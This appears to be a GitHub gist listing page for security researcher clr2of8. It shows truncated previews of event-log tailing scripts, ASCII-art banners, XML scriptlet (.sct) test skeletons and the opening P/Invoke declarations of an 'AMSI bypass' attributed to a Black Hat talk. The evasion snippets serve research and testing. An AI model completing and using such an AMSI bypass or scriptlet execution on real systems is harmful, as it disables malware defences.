Skip to content

Instantly share code, notes, and snippets.

View clr2of8's full-sized avatar

Carrie Roberts clr2of8

287 followers · 0 following
View GitHub Profile
@clr2of8
clr2of8 / asciiart2.ps1
Created June 12, 2023 21:57
$art = @"
__________ _________.__ .__ .__ _____ .___ _____ _________
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ >
\/ \/ \/ \/ \/ \/ \/ \/
"@
Write-Host -Fore Cyan $art
@clr2of8
clr2of8 / asciiart.ps1
Created December 16, 2022 21:18
$art = @"
,ggg, ,ggggggggggg, ,ggggggggggggggg
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88"""""""
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88
dP 88 88888888 gg `" 88 ,8P 8I `"" 88
,8' 88 I8 "" 88aaaad8P" 8I 88
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg,
__ ,8" 88 I8 dP" "Y8ggg,8" "
@clr2of8
clr2of8 / WinEventTail.bat
Created September 30, 2022 23:17
@echo off
SETLOCAL EnableDelayedExpansion
FOR /L %%L IN (0,0,1) DO @(
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do (
set %%a
)
Set Second=0!Second:~0,-1!
Set Second=!Second:~-2!
@clr2of8
clr2of8 / AMSI bypass
Created September 30, 2022 21:17
# source: https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Korkos-AMSI-and-Bypass.pdf
# author: Maor Korkos (@maorkor)
$APIs = @"
using System;
using System.Runtime.InteropServices;
public class APIs {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@clr2of8
clr2of8 / 2.txt
Created September 15, 2022 21:27
<?XML version="1.0"?>
<scriptlet>
<registration
description="a desc"
progid="aprogid"
version="1.00"
classid="{123A1231-1111-2323-2323-2323FEEDACDC}"
>
@clr2of8
clr2of8 / 1.txt
Created September 15, 2022 21:25
<?XML version="1.0"?>
<scriptlet>
</script>
</scriptlet>
@clr2of8
clr2of8 / t2.txt
Created September 15, 2022 21:22
<?XML version="1.0"?>
<scriptlet>
<registration
description="a desc"
progid="aprogid"
version="1.00"
classid="{123A1231-1111-2323-2323-2323FEEDACDC}"
>
@clr2of8
clr2of8 / t.txt
Created September 15, 2022 21:20
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@clr2of8
clr2of8 / test.sct
Created September 15, 2022 21:18 — forked from bohops/test.sct
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@clr2of8
clr2of8 / Watch-EventLogTail.ps1
Created September 11, 2022 01:45 — forked from LeeHolmes/Watch-EventLogTail.ps1
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event